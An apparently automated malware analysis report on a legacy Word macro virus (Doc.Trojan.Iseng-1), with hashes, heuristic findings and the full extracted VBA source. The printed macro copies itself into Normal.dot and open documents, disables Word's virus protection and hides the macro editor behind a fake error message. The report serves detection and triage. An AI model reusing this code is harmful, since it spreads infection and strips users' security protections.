Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 91f4444254d8d542…

MALICIOUS

Office (OLE)

67.0 KB Created: 1999-10-29 15:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3e8ad454e7f5e510ee5138882cde4938 SHA-1: bd3d1639b05288784388b133940112e3f2d75f7e SHA-256: 91f4444254d8d5424d26ee2bf0e172dee5d6d18f4fe417a4a9227a7948abbb68
340 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen macro, which are commonly used for initial execution. The ClamAV detection 'Doc.Trojan.Iseng-1' strongly suggests malicious intent. The embedded VBA code, though partially truncated, indicates attempts to manipulate macro security settings and potentially execute further stages, aligning with a spearphishing attachment attack vector.

Heuristics 7

  • ClamAV: Doc.Trojan.Iseng-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Iseng-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 37,150 bytes but its declared streams total only 0 bytes — 37,150 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3622 bytes
SHA-256: 48d980435ef2e4949651c99d1ec2c0455d6340a74186595b6931fd136b2daf62
Detection
ClamAV: Doc.Trojan.Iseng-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Iseng"
Public A
Public R
Public T
Public Const X = "Please reinstall your Microsoft Office Program"
Public Const V = "Visual Basic"
Public Const W = "Iseng"
Public Const Y = "Isengf"
Public Const Z = "ThisDocument"
Public Const O = "Macro"
Public Const E = " Editor Error"
Function gmm(I, D)
 On Error GoTo S
 gmm = D.VBProject.VBComponents(I).Name
S:
End Function
Sub Fa(I)
 f = Options.DefaultFilePath(Path:=2) & "\Normal.dot"
 On Error GoTo S
 T = GetAttr(f)
 On Error GoTo S
 SetAttr f, I
S:
End Sub
Sub CM(A, T, N)
On Error GoTo S
 Application.OrganizerCopy Source:=A.FullName, Destination:=T.FullName, Name:=N, Object:=3
S:
End Sub
Function CD(D)
 CD = 0
 For I = 1 To D.VBProject.VBComponents.Count
  If gmm(I, D) = W Then
   CD = 1
  End If
 Next I
End Function
Sub CA(D)
 For I = 1 To D.VBProject.VBComponents.Count
  nm = D.VBProject.VBComponents(I).Name
  If (nm <> Z) And (nm <> W) And (nm <> Y) Then
   On Error GoTo S
   Application.OrganizerDelete Source:=D.FullName, Name:=nm, Object:=3
  End If
 Next I
S:
End Sub
Sub DP(X)
 Fa (32)
 With Options
  .VirusProtection = False
  .SaveNormalPrompt = False
 End With
End Sub
Sub Init(X)
 A = Application.DisplayAlerts
 Application.DisplayAlerts = 0
 Call DP(1)
 WordBasic.DisableAutoMacros 0
 With CommandBars(V)
  .Visible = False
  .Enabled = False
  .Protection = 8
  .Protection = 1
 End With
 On Error Resume Next
 CommandBars("Tools").Controls(O).Delete
 CustomizationContext = NormalTemplate
 On Error GoTo 0
End Sub
Sub Bb(X)
 On Error GoTo S
 Application.DisplayAlerts = A
S:
End Sub
Sub Hh(X)
 Call Init(1)
 On Error GoTo S
 NU = CD(NormalTemplate)
 On Error GoTo S
 DU = CD(ActiveDocument)
 If NU = 0 Then
  Call CA(NormalTemplate)
  If DU = 1 Then
   Call CM(ActiveDocument, NormalTemplate, W)
   Call CM(ActiveDocument, NormalTemplate, Y)
  End If
 Else
  If DU = 0 Then
   Call CA(ActiveDocument)
   Call CM(NormalTemplate, ActiveDocument, W)
   Call CM(NormalTemplate, ActiveDocument, Y)
   R = 1
  End If
 End If
S:
 Call Bb(1)
End Sub
Sub Si(X)
 If R = 1 Then
  On Error GoTo S
  ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=0
 End If
S:
End Sub
Sub AutoOpen()
 Call Hh(1)
End Sub
Sub FileClose()
On Error GoTo S
 WordBasic.FileClose
S:
End Sub
Sub FileOpen()
 Dialogs(80).Show
 Call Hh(1)
 Call Si(1)
 Call Bb(1)
End Sub
Sub FileSaveAs()
 Call Hh(1)
 Call Bb(1)
 Dialogs(84).Show
End Sub
Sub FileSave()
 Call Hh(1)
 Call Si(1)
End Sub
Sub HelpAbout()
 On Error GoTo S
 Dialogs(9).Show
 On Error GoTo S
 Isengf.Show
S:
End Sub
Sub FileExit()
 WordBasic.FileExit
End Sub
Sub ToolsOptions()
 Dialogs(974).Show
 Call DP(1)
 On Error GoTo S
 Isengf.Show
S:
End Sub
Sub FileTemplates()
 Call Hh(I)
End Sub
Sub ToolsMacro()
 MsgBox X, 0, O & E
End Sub
Sub ViewVBCode()
    MsgBox X, 0, V & E
End Sub

Attribute VB_Name = "Isengf"
Attribute VB_Base = "0{5429D5FB-8E1D-11D3-ACD9-900936D3B526}{5429D5F5-8E1D-11D3-ACD9-900936D3B526}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False






























Private Sub Okay_Click()
  Hide
End Sub
embedded_office_off00007ae2.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x7AE2 37150 bytes
SHA-256: 5784f451c4976ef505f887ded5bb422f8d07ff1e7643453373c97ad25f42f5e1

Open this report in the interactive analyzer, or submit your own file for analysis.